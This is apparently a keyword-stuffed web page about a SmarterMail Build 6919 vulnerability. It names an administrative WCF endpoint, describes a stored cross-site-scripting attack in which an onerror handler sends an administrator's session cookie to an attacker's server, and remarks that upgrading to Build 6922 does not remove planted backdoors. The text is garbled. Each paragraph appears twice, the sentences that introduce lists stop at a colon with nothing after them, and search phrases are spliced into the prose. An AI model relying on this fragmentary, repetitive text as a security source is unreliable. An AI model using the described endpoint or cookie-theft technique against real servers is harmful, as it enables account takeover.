The vulnerability resided in a specific API endpoint: /Services/ServiceController.svc/ExecuteCommand. The ".svc" extension indicates a Windows Communication Foundation (WCF) service—a framework known for complex serialization handling.
SmarterMail uses this endpoint internally for legitimate administrative tasks, such as starting/stopping services or retrieving server diagnostics. However, the 6919 exploit discovered that the endpoint:
SmarterTools released Build 6922 to address this. The fix involved:
The Gotcha: Patching does not remove the backdoor. If an attacker placed a shell in a log file on January 1st, and you upgrade to Build 6922 on January 15th, that log file is still executable if accessed via the old exploit vector (which is now blocked). However, if the attacker already established a scheduled task or service, patching is futile.
When the administrator logs into SmarterMail via the web interface and views their calendar or the specially crafted email, the web browser renders the payload. The onerror event fires, and the administrator’s session cookie (including their ASP.NET_SessionId) is silently sent to the attacker’s remote server.
If you were hit by this, don't blame the vendor entirely. Your defense-in-depth failed here:
Smartermail 6919 Exploit Official
The vulnerability resided in a specific API endpoint: /Services/ServiceController.svc/ExecuteCommand. The ".svc" extension indicates a Windows Communication Foundation (WCF) service—a framework known for complex serialization handling.
SmarterMail uses this endpoint internally for legitimate administrative tasks, such as starting/stopping services or retrieving server diagnostics. However, the 6919 exploit discovered that the endpoint: smartermail 6919 exploit
SmarterTools released Build 6922 to address this. The fix involved: The vulnerability resided in a specific API endpoint:
The Gotcha: Patching does not remove the backdoor. If an attacker placed a shell in a log file on January 1st, and you upgrade to Build 6922 on January 15th, that log file is still executable if accessed via the old exploit vector (which is now blocked). However, if the attacker already established a scheduled task or service, patching is futile. The Gotcha: Patching does not remove the backdoor
When the administrator logs into SmarterMail via the web interface and views their calendar or the specially crafted email, the web browser renders the payload. The onerror event fires, and the administrator’s session cookie (including their ASP.NET_SessionId) is silently sent to the attacker’s remote server.
If you were hit by this, don't blame the vendor entirely. Your defense-in-depth failed here: